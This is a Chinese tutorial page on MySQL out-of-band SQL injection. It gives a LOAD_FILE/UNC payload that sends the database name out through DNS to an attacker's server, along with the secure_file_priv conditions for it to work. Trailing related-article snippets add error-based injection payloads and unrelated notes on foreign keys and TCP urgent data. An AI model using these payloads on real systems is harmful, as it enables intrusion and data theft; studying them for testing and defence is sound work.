mysql 带外注入

带外通道


有时候注入发现并没有回显,也不能利用时间盲注,那么就可以利用带外通道,也就是利用其他协议或者渠道,如http请求、DNS解析、SMB服务等将数据带出。

payload

 SELECT LOAD_FILE(CONCAT(‘\\\\‘,( SELECT DATABASE() ),‘.xx.xx\\x));

其中的load_file的地址为一个远程文件,mysql在load_file()一个远程文件时会发送dns请求包去解析,所以可以带出数据,‘\\data.xx.xx\x‘ ,xx.xx为自己的服务器名,没有的话可以去这里申请一个 ceye.io

mysql带外注入条件


1. mysql.ini 中 secure_file_priv 必须为空

( ps. 修改mysql.ini 文件,在[mysqld] 下加入 secure_file_priv =   )

mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

  • 当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
  • 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
  • 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

2. 从payload看出load_file的路径是windows下的UNC路径,所以mysql带外注入只能发生在windows机器上

UNC路径

测试


原文地址:https://www.cnblogs.com/leixiao-/p/9876313.html

时间: 2024-11-08 18:35:36

mysql 带外注入的相关文章

删除带外键的表【foreign key constraint fails】报错

title: 删除带外键的表[foreign key constraint fails]报错 date: 2018-08-02 21:59:06 tags: 数据库 --- 遥想当时正在学hibernate的时候,刚好学到了一对多,多对多的关联操作.时间也正是刚好在那是有了一个项目,把各表的间的结构还理清,俗话说学到就要用到,就把这些表的结构都能配置级联关系的都把它配上.没想到就在这里给自己放了个小坑.前几天在一个帖子中看到别人说,尽量少配些ORM约束,数据库的外键约束什么的.当时还不以为然.没

MySQL的外键约束:Cascade/Restrict/No action/SET NULL

转自:http://blog.csdn.net/cnjsnt_s/article/details/5548280 具体使用时需要参考:http://blog.csdn.net/codeforme/article/details/5539454 (注:没看很明白,囧.) MySQL有两种常用的引擎类型:MyISAM和InnoDB.目前只有InnoDB引擎类型支持外键约束.InnoDB中外键约束定义的语法如下: [CONSTRAINT [symbol]] FOREIGN KEY [index_nam

SQL注入之mysql显错注入

在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你知道sqlmap里面有对应的脚本的话,烦请告知一下,谢谢!. 图1 获取数据库失败 此时我们可以考虑下是否是显错注入,对于显错注入我们可以使用mysql

TCP带外数据测试

带外数据的应用情况 如果发送客户端程序由于一些原因需要取消已经写入服务器的请求,那么他就需要向服务器紧急发送一个标识取消的请求. 使用带外数据的实际程序例子就是telnet,rlogin,ftp命令. 前两个程序(telnet和rlogin)会将中止字符作为紧急数据发送到远程端.这会允许远程端冲洗所有未处理的输入,并且丢弃所有未发送的终端输出.这会快速中断一个向我们屏幕发送大量数据 的运行进程. ftp命令使用带外数据来中断一个文件的传输. TCP的带外数据(TCP紧急数据) TCP协议没有真正

十种MYSQL显错注入原理讲解(二)

上一篇讲过,三种MYSQL显错注入原理.下面我继续讲解. 1.geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 函数讲解: GeometryCollection是由1个或多个任意类几何对象构成的几何对象.GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系).对Ge

TCP带外数据(URG,MSG_OOB)

前言: blog原文地址:http://blog.csdn.net/ordeder/article/details/43243425 本文系读书笔记,主要参考材料:http://wenku.baidu.com/view/f04a4dff9e31433239689341.html TCP的带外数据: 头部标志: URG位,紧急指针. 数据包中:一个紧急指针只指向一个字节的带外数据的后已字节位置.紧急数据时插在正常数据流中进行传输.紧急指针用于指出带外数据字节在正常字节流中的位置. 问题:为何不直接

微软公布带外安全更新MS14-068

?? 11月19日,微软公布了带外更新MS14-068以解决Windows 系统中的一个安全漏洞,该补丁安全等级为"严重". MS14-068 | Kerberos 中的漏洞可能同意特权提升 该安全更新攻克了Windows Kerberos KDC 中一个秘密报告的漏洞. 该漏洞可能同意普通域账户提升特权,进而获得域管理员的权限.攻击者要想成功利用该漏洞.其必须首先又有一个有效的域账户.针对该漏洞,微软已经发现有限的攻击行为. 我们建议用户尽快安装该补丁.有关该补丁的具体信息,请參照以

十种MYSQL显错注入原理讲解(一)

开篇我要说下,在<代码审计:企业级Web代码安全架构>这本书中讲十种MYSQL显错注入,讲的很清楚. 感兴趣请去读完,若处于某种原因没读还想了解,那请继续往下. 1.count,rand,floor select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 函数解释

TCP带外数据学习总结(概念,发送接收过程,数据到达检测,代码实现)

最近在学习<Linux高性能服务器编程> 这本书,书中零零散散的讲了TCP带外数据的一些知识,在这里把这些知识总结以下,方便自己,也方便他人. 本文主要分为以下四个方面总结,分别为 TCP带外数据的概念,如何发送和接收带外数据,怎么检测带外数据的到达,最后介绍相关函数以及代码实现. 第一部分: TCP带外数据的概念 有很多传输层此协议都具有带外数据(OUT Of Band) 的概念,其作用是迅速通告通信的另一方本段发生的重要事件.带外数据具有比普通数据更高的优先级,理论上应该被立即发送和立即接